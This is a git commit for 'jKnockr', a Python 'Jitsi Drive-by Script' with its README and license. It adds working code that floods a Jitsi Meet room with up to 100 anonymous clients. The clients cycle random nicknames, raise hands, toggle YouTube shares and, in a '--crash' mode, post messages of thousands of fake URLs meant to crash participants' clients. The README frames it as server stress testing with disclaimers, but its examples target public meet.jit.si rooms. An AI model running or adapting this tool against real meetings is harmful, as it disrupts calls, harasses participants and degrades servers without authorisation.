Cleaned up

This commit is contained in:
Dionysus 2024-10-12 22:03:26 -04:00
parent cc15679c08
commit 5fc3476860
Signed by: acidvegas
GPG Key ID: EF4B922DB85DC9DE
3 changed files with 185 additions and 117 deletions

15
LICENSE Normal file
View File

@ -0,0 +1,15 @@
ISC License
Copyright (c) 2024, acidvegas <acid.vegas@acid.vegas>
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

View File

@ -1,4 +1,81 @@
# jKnockr
> Jitsi Drive-by Script
# jKnockr - Jitsi Drive-by Script
## Work in Progress >:)
## ⚠️ Warning: Use this script responsibly and only on servers and rooms that you own or have explicit permission to test. Unauthorized use on public servers or rooms may violate terms of service and laws. The developer is not liable for any misuse of this script.
## Overview
jKnockr is a Python script designed to stress test Jitsi Meet servers by simulating multiple clients performing various actions such as messaging, hand raising, nickname changes, and video sharing. This tool helps administrators evaluate the performance and stability of their Jitsi servers under load.
## Features
- **Concurrent Clients:** Simulate multiple clients joining a room using threading.
- **Messaging:** Send custom messages to the room.
- **Crash Test:** Option to send large messages containing thousands of fake URLs to test client-side handling.
- **Hand Raising:** Simulate clients raising and lowering their hands.
- **Nickname Changes:** Change nicknames dynamically during the session.
- **YouTube Video Sharing:** Share a YouTube video in the room.
## Usage
### Prerequisites
- Python 3.x
- No external libraries are required; uses only standard Python libraries.
### Command-Line Syntax
```bash
python3 jknockr.py <target> [options]
```
- `<target>`: The room URL (e.g., `https://meet.jit.si/roomname` or `https://yourserver.com/yourroom`).
### Options
- `--crash`: Enable crash test by sending large messages with random fake URLs.
- `--message "Your message"`: Send a custom message to the room.
- `--hand`: Enable hand raising simulation.
- `--nick` or `--nick "Nickname"`: Enable nickname changes. Optionally provide a base nickname.
- `--youtube "YouTube URL"`: Share a YouTube video in the room.
- `--threads N`: Number of client threads to simulate (default is 100).
### Examples
- **Stress Test with Crash and Hand Raising:**
```bash
python3 jknockr.py https://yourserver.com/yourroom --crash --hand --threads 30
```
- **Send Custom Message with Nickname Changes:**
```bash
python3 jknockr.py https://meet.jit.si/roomname --message "Hello World" --nick --threads 5
```
- **Share a YouTube Video with Custom Nickname:**
```bash
python3 jknockr.py https://yourserver.com/yourroom --youtube "https://www.youtube.com/watch?v=21lma6hU3mk" --nick "Tester" --threads 3
```
## How It Works
- **Client Simulation:** The script creates multiple threads, each simulating a client that connects to the specified Jitsi room.
- **Session Establishment:** Each client establishes a session with the server using BOSH (Bidirectional-streams Over Synchronous HTTP).
- **Actions:** Depending on the options provided, clients perform actions like sending messages, changing nicknames, raising hands, and sharing videos.
- **Crash Test:** When `--crash` is enabled, clients send large messages containing thousands of fake URLs to test the server's handling of heavy message loads.
## Important Notes
- **Ethical Use:** This script is intended for testing purposes on servers and rooms that you own or manage. Do not use it to disrupt public Jitsi Meet instances or rooms without permission.
- **Server Impact:** Running this script can significantly impact server performance. Monitor your server resources during testing.
- **Legal Responsibility:** You are responsible for ensuring that your use of this script complies with all applicable laws and terms of service.
## Disclaimer
The developer provides this script "as is" without any warranties. Use it at your own risk. The developer is not responsible for any damage or misuse of this script.
___
###### Mirrors for this repository: [acid.vegas](https://git.acid.vegas/jknockr) • [SuperNETs](https://git.supernets.org/acidvegas/jknockr) • [GitHub](https://github.com/acidvegas/jknockr) • [GitLab](https://gitlab.com/acidvegas/jknockr) • [Codeberg](https://codeberg.org/acidvegas/jknockr)

View File

@ -4,6 +4,7 @@
import argparse
import http.cookiejar
import random
import re
import socket
import string
import threading
@ -14,37 +15,39 @@ import urllib.request
import xml.etree.ElementTree as ET
def client_join(client_id, tlds, args):
'''Performs the client join process and handles messaging, hand raising, nickname changes, and video sharing.'''
def client_join(client_id: int, tlds: list, args: argparse.Namespace, video_id: str) -> None:
'''Performs the client join process and handles messaging, hand raising, nickname changes, and video sharing.
:param client_id: The ID of the client (thread number)
:param tlds: List of TLDs to use for generating messages
:param args: Parsed command-line arguments
:param video_id: YouTube video ID to share
'''
try:
print(f'Client {client_id}: Starting')
# Create a cookie jar and an opener with HTTPCookieProcessor
cookie_jar = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookie_jar))
headers = {
'Content-Type': 'text/xml; charset=utf-8'
}
# Generate a large random number for the initial 'rid'
headers = {'Content-Type': 'text/xml; charset=utf-8'}
rid = random.randint(1000000, 9999999)
# Generate an initial random nickname of 50 characters (letters and numbers)
nickname = ''.join(random.choices(string.ascii_letters + string.digits, k=50))
# Extract domain and room name from the target URL
parsed_url = urllib.parse.urlparse(args.target)
target_domain = parsed_url.hostname
room_name = parsed_url.path.strip('/')
if not room_name:
print(f'Client {client_id}: No room name specified in the target URL.')
return
bosh_url = f'https://{target_domain}/http-bind'
# Step 1: Establish a session
if args.nick:
if isinstance(args.nick, str) and args.nick is not True:
base_nick = args.nick
random_length = 50 - len(base_nick) - 2
if random_length < 0:
print(f'Client {client_id}: Nickname is too long.')
return
nickname = ''.join(random.choices(string.ascii_letters + string.digits, k=random_length//2)) + '_' + base_nick + '_' + ''.join(random.choices(string.ascii_letters + string.digits, k=random_length - random_length//2))
else:
nickname = ''.join(random.choices(string.ascii_letters + string.digits, k=50))
else:
nickname = ''.join(random.choices(string.ascii_letters + string.digits, k=10))
print(f'Client {client_id}: Establishing session')
body = f'''<body rid='{rid}' to='{target_domain}' xml:lang='en' wait='60' hold='1' xmlns='http://jabber.org/protocol/httpbind'/>'''
request = urllib.request.Request(bosh_url, data=body.encode('utf-8'), headers=headers, method='POST')
@ -56,11 +59,7 @@ def client_join(client_id, tlds, args):
print(f'Client {client_id}: Server response: {response_text}')
return
print(f'Client {client_id}: Obtained session ID: {sid}')
# Increment rid
rid += 1
# Step 2: Send authentication request
print(f'Client {client_id}: Sending authentication request')
auth_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind'>
<auth mechanism='ANONYMOUS' xmlns='urn:ietf:params:xml:ns:xmpp-sasl'/>
@ -74,21 +73,12 @@ def client_join(client_id, tlds, args):
print(f'Client {client_id}: Authentication failed.')
print(f'Client {client_id}: Server response: {response_text}')
return
# Increment rid
rid += 1
# Step 3: Restart the stream
print(f'Client {client_id}: Restarting stream')
restart_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind' to='{target_domain}' xml:lang='en' xmpp:restart='true' xmlns:xmpp='urn:xmpp:xbosh'/>'''
request = urllib.request.Request(bosh_url, data=restart_body.encode('utf-8'), headers=headers, method='POST')
response = opener.open(request, timeout=10)
response_text = response.read().decode('utf-8')
# Increment rid
rid += 1
# Step 4: Bind resource
print(f'Client {client_id}: Binding resource')
bind_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind'>
<iq type='set' id='bind_1' xmlns='jabber:client'>
@ -104,18 +94,12 @@ def client_join(client_id, tlds, args):
print(f'Client {client_id}: Server response: {response_text}')
return
print(f'Client {client_id}: Bound resource. JID: {jid}')
# Increment rid
rid += 1
# Step 5: Send initial presence to join the room without hand raised
print(f'Client {client_id}: Sending initial presence')
presence_elements = [
'<x xmlns=\'http://jabber.org/protocol/muc\'/>',
f'<nick xmlns=\'http://jabber.org/protocol/nick\'>{nickname}</nick>'
]
# Build the presence stanza
presence_stanza = ''.join(presence_elements)
room_jid = f'{room_name}@conference.{target_domain}/{nickname}'
presence_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind'>
@ -128,40 +112,30 @@ def client_join(client_id, tlds, args):
response_text = response.read().decode('utf-8')
print(f'Client {client_id}: Server response to initial presence (join room):')
print(response_text)
# Increment rid
rid += 1
# Step 6: Send messages with hand raise/lower, nickname change, and video sharing
hand_raised = True # Start with hand raised if enabled
for i in range(1, 101): # Adjust number of iterations/messages per client as needed
hand_raised = True
for i in range(1, 101):
print(f'Client {client_id}: Starting iteration {i}')
# Generate a new random nickname if nickname change is enabled
if args.nick:
nickname = ''.join(random.choices(string.ascii_letters + string.digits, k=50))
if isinstance(args.nick, str) and args.nick is not True:
base_nick = args.nick
random_length = 50 - len(base_nick) - 2
if random_length < 0:
print(f'Client {client_id}: Nickname is too long.')
return
nickname = ''.join(random.choices(string.ascii_letters + string.digits, k=random_length//2)) + '_' + base_nick + '_' + ''.join(random.choices(string.ascii_letters + string.digits, k=random_length - random_length//2))
else:
nickname = ''.join(random.choices(string.ascii_letters + string.digits, k=50))
presence_elements = []
presence_elements.append(f'<nick xmlns=\'http://jabber.org/protocol/nick\'>{nickname}</nick>')
# Handle hand raise/lower
if args.hand:
timestamp = int(time.time() * 1000)
if hand_raised:
presence_elements.append(f'<jitsi_participant_raisedHand>{timestamp}</jitsi_participant_raisedHand>')
# Toggle hand raised status for next iteration
hand_raised = not hand_raised
# Handle video sharing
if args.youtube:
# Example YouTube video ID (you can randomize or set this as needed)
video_id = '21lma6hU3mk'
# Alternate video state between 'start' and 'stop'
if args.youtube and video_id:
video_state = 'start' if i % 2 == 1 else 'stop'
presence_elements.append(f'<shared-video from=\'{jid}\' state=\'{video_state}\' time=\'0\'>{video_id}</shared-video>')
# Build and send the presence update if any of the presence-related features are enabled
if args.nick or args.hand or args.youtube:
presence_stanza = ''.join(presence_elements)
room_jid = f'{room_name}@conference.{target_domain}/{nickname}'
@ -175,20 +149,15 @@ def client_join(client_id, tlds, args):
response_text = response.read().decode('utf-8')
print(f'Client {client_id}: Server response to presence update:')
print(response_text)
# Increment rid
rid += 1
# Send message if messaging is enabled
if args.message:
# Build the message content
try:
if args.crash or args.message:
if args.crash:
if not tlds:
print(f'Client {client_id}: TLD list is empty. Using default TLDs.')
tlds = ['com', 'net', 'org', 'info', 'io']
msg = ' '.join(f'{random_word(5)}.{random.choice(tlds)}' for _ in range(5))
except IndexError as e:
print(f'Client {client_id}: Error generating message: {e}')
msg = 'defaultmessage.com'
msg = ' '.join(f'{random_word(5)}.{random.choice(tlds)}' for _ in range(2500))
elif args.message:
msg = args.message
message_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind'>
<message to='{room_name}@conference.{target_domain}' type='groupchat' xmlns='jabber:client'>
<body>{msg}</body>
@ -199,17 +168,17 @@ def client_join(client_id, tlds, args):
response_text = response.read().decode('utf-8')
print(f'Client {client_id}: Server response to message {i}:')
print(response_text)
# Increment rid
rid += 1
print(f'Client {client_id}: Finished')
except Exception as e:
print(f'Client {client_id}: Exception occurred: {e}')
def extract_jid(response_text):
'''Extracts the JID from the XML response.'''
def extract_jid(response_text: str) -> str:
'''Extracts the JID from the XML response.
:param response_text: The XML response text from which to extract the JID
'''
try:
root = ET.fromstring(response_text)
for elem in root.iter():
@ -220,8 +189,11 @@ def extract_jid(response_text):
return None
def extract_sid(response_text):
'''Extracts the SID from the XML response.'''
def extract_sid(response_text: str) -> str:
'''Extracts the SID from the XML response.
:param response_text: The XML response text from which to extract the SID
'''
try:
root = ET.fromstring(response_text)
return root.attrib.get('sid')
@ -229,66 +201,70 @@ def extract_sid(response_text):
return None
def force_ipv4():
def force_ipv4() -> None:
'''Forces the use of IPv4 by monkey-patching socket.getaddrinfo.'''
# Save the original socket.getaddrinfo
socket._original_getaddrinfo = socket.getaddrinfo
# Define a new getaddrinfo function that filters out IPv6
def getaddrinfo_ipv4_only(host, port, family=0, type=0, proto=0, flags=0):
return socket._original_getaddrinfo(host, port, socket.AF_INET, type, proto, flags)
# Override socket.getaddrinfo
socket.getaddrinfo = getaddrinfo_ipv4_only
def main():
def main() -> None:
'''Main function to start threads and execute the stress test.'''
# Parse command-line arguments
parser = argparse.ArgumentParser(description='Stress test a Jitsi Meet server.')
parser.add_argument('target', help='Target room URL (e.g., https://meet.jit.si/roomname)')
parser.add_argument('--message', action='store_true', help='Enable messaging')
parser.add_argument('--crash', action='store_true', help='Enable crash (send large messages with random TLDs)')
parser.add_argument('--message', type=str, help='Send a custom message')
parser.add_argument('--hand', action='store_true', help='Enable hand raising')
parser.add_argument('--nick', action='store_true', help='Enable nickname changes')
parser.add_argument('--youtube', action='store_true', help='Enable video sharing')
parser.add_argument('--threads', type=int, default=1, help='Number of threads (clients) to use')
parser.add_argument('--nick', nargs='?', const=True, help='Enable nickname changes. Optionally provide a nickname')
parser.add_argument('--youtube', type=str, help='Share a YouTube video (provide URL)')
parser.add_argument('--threads', type=int, default=100, help='Number of threads (clients) to use')
args = parser.parse_args()
# Fetch the list of TLDs
print('Fetching TLDs')
try:
tlds_url = 'https://data.iana.org/TLD/tlds-alpha-by-domain.txt'
request = urllib.request.Request(tlds_url)
with urllib.request.urlopen(request, timeout=10) as response:
response_text = response.read().decode('utf-8')
tlds = [line.lower() for line in response_text.splitlines() if not line.startswith('#')]
print(f'Number of TLDs fetched: {len(tlds)}')
if not tlds:
print('TLD list is empty after fetching. Using default TLDs.')
tlds = ['com', 'net', 'org', 'info', 'io']
except Exception as e:
print(f'Failed to fetch TLDs: {e}')
print('Using default TLDs.')
tlds = ['com', 'net', 'org', 'info', 'io']
tlds = []
if args.crash:
print('Fetching TLDs')
try:
tlds_url = 'https://data.iana.org/TLD/tlds-alpha-by-domain.txt'
request = urllib.request.Request(tlds_url)
with urllib.request.urlopen(request, timeout=10) as response:
response_text = response.read().decode('utf-8')
tlds = [line.lower() for line in response_text.splitlines() if not line.startswith('#')]
print(f'Number of TLDs fetched: {len(tlds)}')
if not tlds:
print('TLD list is empty after fetching. Using default TLDs.')
tlds = ['com', 'net', 'org', 'info', 'io']
except Exception as e:
print(f'Failed to fetch TLDs: {e}')
print('Using default TLDs.')
tlds = ['com', 'net', 'org', 'info', 'io']
video_id = None
if args.youtube:
youtube_url = args.youtube
video_id_match = re.search(r'(?:v=|\/)([0-9A-Za-z_-]{11}).*', youtube_url)
if video_id_match:
video_id = video_id_match.group(1)
print(f'Parsed YouTube video ID: {video_id}')
else:
print('Invalid YouTube URL provided.')
return
threads = []
for i in range(args.threads):
t = threading.Thread(target=client_join, args=(i, tlds, args))
t = threading.Thread(target=client_join, args=(i, tlds, args, video_id))
threads.append(t)
t.start()
# Optionally, join threads if you want the main thread to wait
for t in threads:
t.join()
def random_word(length):
'''Generates a random word of a given length.'''
def random_word(length: int) -> str:
'''Generates a random word of a given length.
:param length: The length of the word to generate
'''
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for _ in range(length))
if __name__ == '__main__':
force_ipv4()
main()
main()